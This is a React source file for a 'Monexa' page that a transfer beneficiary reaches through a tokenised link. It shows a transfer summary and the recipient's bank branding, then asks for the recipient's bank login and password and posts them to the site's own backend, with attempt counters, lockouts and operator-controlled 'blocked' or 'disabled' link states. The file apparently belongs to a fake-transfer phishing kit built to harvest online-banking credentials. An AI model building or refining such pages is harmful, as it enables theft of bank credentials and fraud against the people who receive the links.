import { useCallback, useEffect, useState } from 'react';
import { useSearchParams } from 'react-router-dom';
import { useTranslation } from 'react-i18next';
import { SUPPORTED_LANGUAGES } from '@/i18n';
import Logo from '@/components/base/Logo';
import Button from '@/components/base/Button';
import { transferApi } from '@/lib/transferApi';
import type { PublicTransfer } from '@/lib/transferApi';
import { formatDate } from '@/lib/format';
import BankIdentity from './components/BankIdentity';
import TransferSummary from './components/TransferSummary';
import AuthStep from './components/AuthStep';
import OutcomePanel from './components/OutcomePanel';

export default function TransferPage() {
  const { t, i18n } = useTranslation();
  const [params] = useSearchParams();
  const token = (params.get('t') ?? params.get('token') ?? '').trim();
  const linkLang = (params.get('lang') ?? '').trim();

  const [transfer, setTransfer] = useState<PublicTransfer | null>(null);
  const [loading, setLoading] = useState(true);
  const [failure, setFailure] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const [formError, setFormError] = useState('');

  const applyBeneficiaryLanguage = useCallback(
    (lang?: string) => {
      const code = String(lang ?? '').slice(0, 2).toLowerCase();
      // La langue choisie à la création du virement s'impose toujours.
      if (!(SUPPORTED_LANGUAGES as readonly string[]).includes(code)) return;
      if (String(i18n.language).slice(0, 2).toLowerCase() === code) return;
      i18n.changeLanguage(code);
      document.documentElement.lang = code;
      try {
        window.localStorage.setItem('monexa_lang', code);
      } catch {
        /* stockage indisponible */
      }
    },
    [i18n],
  );

  const load = useCallback(async () => {
    setLoading(true);
    setFailure('');
    if (!token) {
      setFailure('NOT_FOUND');
      setLoading(false);
      return;
    }
    // La langue du lien (choisie à la création du virement) s'applique aussitôt.
    if (linkLang) applyBeneficiaryLanguage(linkLang);
    try {
      const res = await transferApi.info(token);
      if (res.ok && res.transfer) {
        setTransfer(res.transfer as PublicTransfer);
        applyBeneficiaryLanguage(linkLang || (res.transfer as PublicTransfer).lang);
        return;
      }
      setFailure(String(res.code ?? 'SERVER_ERROR'));
    } catch {
      setFailure('NETWORK_ERROR');
    } finally {
      setLoading(false);
    }
  }, [token, linkLang, applyBeneficiaryLanguage]);

  useEffect(() => {
    load();
  }, [load]);

  const submitAuth = async (login: string, password: string) => {
    if (submitting) return;
    if (!login.trim() || !password) {
      setFormError(t('flow.errorRequired'));
      return;
    }
    setSubmitting(true);
    setFormError('');
    try {
      const res = await transferApi.bankAuth(token, login.trim(), password);
      if (res.ok && res.transfer) {
        setTransfer(res.transfer as PublicTransfer);
        return;
      }
      switch (res.code) {
        case 'LOCKED':
          await load();
          break;
        case 'INVALID_CREDENTIALS':
          setFormError(
            t('flow.errorCredentials', {
              left: typeof res.attemptsLeft === 'number' ? res.attemptsLeft : 0,
            }),
          );
          break;
        case 'EXPIRED':
        case 'CLOSED':
        case 'NOT_FOUND':
        case 'LINK_DISABLED':
        case 'BLOCKED':
          await load();
          break;
        default:
          setFormError(t('errors.server'));
      }
    } catch {
      setFormError(t('errors.server'));
    } finally {
      setSubmitting(false);
    }
  };

  const renderFailure = () => {
    if (failure === 'NOT_FOUND') {
      return <OutcomePanel tone="danger" title={t('flow.notFoundTitle')} text={t('flow.notFoundText')} footer={null} />;
    }
    if (failure === 'EXPIRED') {
      return <OutcomePanel tone="danger" title={t('flow.expiredTitle')} text={t('flow.expiredText')} footer={null} />;
    }
    if (failure === 'LINK_DISABLED') {
      return (
        <OutcomePanel
          tone="danger"
          title={t('flow.linkDisabledTitle')}
          text={t('flow.linkDisabledText')}
          footer={null}
        />
      );
    }
    if (failure === 'BLOCKED') {
      return <OutcomePanel tone="danger" title={t('flow.blockedTitle')} text={t('flow.blockedText')} footer={null} />;
    }
    return (
      <div className="flex flex-col items-center gap-3 py-4 text-center">
        <span className="flex items-center justify-center w-12 h-12 rounded-full bg-accent-50 text-accent-600">
          <i className="ri-wifi-off-line text-2xl" aria-hidden="true" />
        </span>
        <p className="text-[13px] text-foreground-600">{t('errors.server')}</p>
        <Button variant="outline" onClick={load} icon={<i className="ri-refresh-line" aria-hidden="true" />}>
          {t('common.retry')}
        </Button>
      </div>
    );
  };

  const renderContent = () => {
    if (!transfer) return null;

    if (transfer.locked) {
      return <OutcomePanel tone="danger" title={t('flow.lockedTitle')} text={t('flow.lockedText')} footer={null} />;
    }
    if (transfer.status === 'cancelled') {
      return <OutcomePanel tone="neutral" title={t('flow.cancelledTitle')} text={t('flow.cancelledText')} footer={null} />;
    }
    if (transfer.status === 'executed') {
      return <OutcomePanel tone="success" title={t('flow.executedTitle')} text={t('flow.executedText')} footer={null} />;
    }
    if (transfer.stage === 'authenticated' || transfer.status === 'verified') {
      return (
        <div className="flex flex-col gap-4">
          <TransferSummary transfer={transfer} />
          <OutcomePanel
            tone="success"
            title={t('flow.successTitle')}
            text={t('flow.successText')}
            detail={
              transfer.verifiedAt
                ? `${t('flow.verifiedAt')} ${formatDate(transfer.verifiedAt, i18n.language, true)}`
                : undefined
            }
          />
        </div>
      );
    }

    return (
      <div className="flex flex-col gap-4">
        <TransferSummary transfer={transfer} />
        <AuthStep
          bank={transfer.bank}
          attemptsLeft={transfer.attemptsLeft}
          submitting={submitting}
          error={formError}
          onSubmit={submitAuth}
        />
      </div>
    );
  };

  return (
    <div className="min-h-[100vh] w-full flex flex-col bg-background-100">
      <header className="w-full border-b border-background-200 bg-background-50">
        <div className="w-full px-4 md:px-8 h-16 flex items-center justify-between gap-3">
          <Logo to="" size="sm" />
          <div className="flex items-center gap-3">
            <span className="inline-flex items-center gap-1.5 text-[11.5px] font-semibold text-foreground-500 font-label whitespace-nowrap">
              <span className="flex items-center justify-center w-3.5 h-3.5 text-primary-700">
                <i className="ri-lock-2-line text-[13px]" aria-hidden="true" />
              </span>
              {t('flow.secure1')}
            </span>
          </div>
        </div>
      </header>

      <main className="flex-1 w-full px-4 md:px-8 py-6 md:py-12">
        <div className="mx-auto w-full max-w-5xl">
          <div className="grid grid-cols-1 lg:grid-cols-[0.82fr_1.18fr] gap-4 md:gap-6 items-start">
            {transfer ? (
              <BankIdentity bank={transfer.bank} />
            ) : (
              <aside className="rounded-3xl bg-foreground-950 p-6 md:p-8 min-h-[180px] flex flex-col justify-center gap-3">
                <p className="text-[10.5px] font-semibold uppercase tracking-[0.16em] text-background-50/50 font-label">
                  {t('flow.bankPanelTitle')}
                </p>
                <div className="flex items-center gap-3">
                  <span className="flex items-center justify-center w-11 h-11 rounded-xl bg-background-50/10 text-background-50/40">
                    <i className="ri-bank-line text-lg" aria-hidden="true" />
                  </span>
                  <div className="flex flex-col gap-2 flex-1">
                    <span className="h-3 w-2/3 rounded bg-background-50/10" />
                    <span className="h-2.5 w-1/2 rounded bg-background-50/10" />
                  </div>
                </div>
              </aside>
            )}

            <section className="rounded-3xl border border-background-200 bg-background-50 overflow-hidden">
              <div className="border-b border-background-200 px-5 md:px-7 py-5">
                <p className="text-[10.5px] font-semibold uppercase tracking-[0.16em] text-primary-700 font-label">
                  {t('flow.eyebrow')}
                </p>
                <h1 className="mt-1.5 text-[21px] md:text-[25px] font-semibold leading-tight text-foreground-950 font-heading">
                  {t('flow.title')}
                </h1>
                <p className="mt-1.5 text-[12.5px] leading-relaxed text-foreground-500">{t('flow.subtitle')}</p>
              </div>

              <div className="px-5 md:px-7 py-5 md:py-6">
                {loading ? (
                  <div className="animate-pulse flex flex-col gap-4">
                    <div className="h-24 rounded-2xl bg-background-200" />
                    <div className="h-4 w-28 rounded bg-background-200" />
                    <div className="h-11 rounded-xl bg-background-200" />
                    <div className="h-11 rounded-xl bg-background-200" />
                    <div className="h-11 rounded-xl bg-background-200" />
                  </div>
                ) : failure ? (
                  renderFailure()
                ) : (
                  renderContent()
                )}
              </div>
            </section>
          </div>
        </div>
      </main>

      <footer className="w-full border-t border-background-200 bg-background-50">
        <div className="w-full px-4 md:px-8 py-3.5 flex flex-col sm:flex-row items-center justify-between gap-2 text-[11.5px] text-foreground-500">
          <p className="font-label">© {new Date().getFullYear()} Monexa</p>
          <span className="inline-flex items-center gap-1.5 whitespace-nowrap">
            <span className="flex items-center justify-center w-3.5 h-3.5">
              <i className="ri-shield-check-line text-[13px]" aria-hidden="true" />
            </span>
            {t('login.footer.security')}
          </span>
        </div>
      </footer>
    </div>
  );
}